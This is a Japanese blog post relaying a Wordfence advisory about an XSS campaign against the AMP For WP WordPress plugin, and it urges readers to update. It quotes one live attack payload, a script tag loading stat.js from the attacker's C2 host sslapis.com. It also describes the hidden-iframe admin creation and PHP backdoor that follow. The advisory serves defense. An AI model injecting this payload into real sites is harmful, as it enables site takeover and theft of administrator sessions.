【脆弱性情報】AMP For WP Plugin:バックドアを設置され管理者権限で悪用される恐れ

WordPress

取り急ぎ情報です。

セキュリティプラグインとして入れている「WordDefence」を運営する wordfence.com より昨晩アナウンスがありました。

100,000を超えるアクティブなインストールが行われているWordPressプラグイン「AMP For WP Plugin」に重大な脆弱性が見つかった。





この脆弱性を悪用するとXSSの脆弱性を悪用してセッションハイジャックすることにより第3者が管理者権限を持つ新しい管理者アカウントを作成し自由に編集、更なる不正プログラムの導入が可能となってしまいます。

本WordDefenceの記事を受け、AMP For WP Pluginは早急にセキュアアップデートをしています。

セキュリティパッチが適用されたver.0.9.97.20がリリースされていますので、ご利用の方は急ぎ最新バージョンにアップデートしてください。

AMP for WP – Accelerated Mobile Pages
AMP for WP is the most recommended AMP plugin by the community. Automatically add Accelerated Mobile Pages (Google AMP Project) functionality on your …



現在WordDefenceのオペレーションチームで技術仕様情報を公開しています。

XSS Injection Campaign Exploits WordPress AMP Plugin
News broke last week disclosing a number of vulnerabilities in the AMP For WP plugin, installed on over 100,000 WordPress sites. WordPress contributor Sybre Waa...

以下、詳細です。ざっくり意訳を交えた情報となってしまっていますがご容赦。

====================================

本プラグインではAJAXフックに関連する機能チェックが全体的に欠如してしまっている。
WordPressデータベースに格納されているプラグイン独自のオプションを変更する事で悪用が可能となる。

ログインしている管理者に影響を与えることを目的として、次のXSSペイロードを被害者のサイトのコンテンツに挿入することができる。

<script src = https://sslapis.com/assets/si/stat.js> </ script> 



これにより管理者のブラウザが悪質なJavaScriptを実行すると、 sslapis.comコマンド・コントロール(C2)サーバーからペイロードされる。

このスクリプトstat.jsには、いくつかの注目すべき機能が含まれており、C2サーバーはJavaScriptペイロードとブラウザセッションからデータを受け取るために使用されるスクリプトが実行される。
このC2サーバでホストされているJavaScriptファイルには、マルウェアの作成者が開発中にさまざまな機能をテストするために使用されているコメントアウトされた行がいくつか含まれており、いつでも変更できてしまうため非常にリスクがある。

悪意あるJavascriptを実行されてしまうと、隠しiframeを使用してユーザー登録プロセスを実行しようとすることができる。
非表示のiframe要素を作成した後、スクリプトは新規ユーザーフォームに記入するプロセスをシミュレートし偽装の管理者権限を設定、新しい管理者アカウントを作成できてしまう。

さらに管理者権限のもと、プラグインのコードにバックドア(第三者が容易にアクセスできてしまうコードインタフェース)を設けるPHPコードを注入できてしまう。
すると、悪質な管理者権限を持つアカウントを削除しても、このバックドア経由でプラグインを有効にしている限り、不正に対象のWebサイトに管理者権限レベルでアクセスできてしまう。

コメント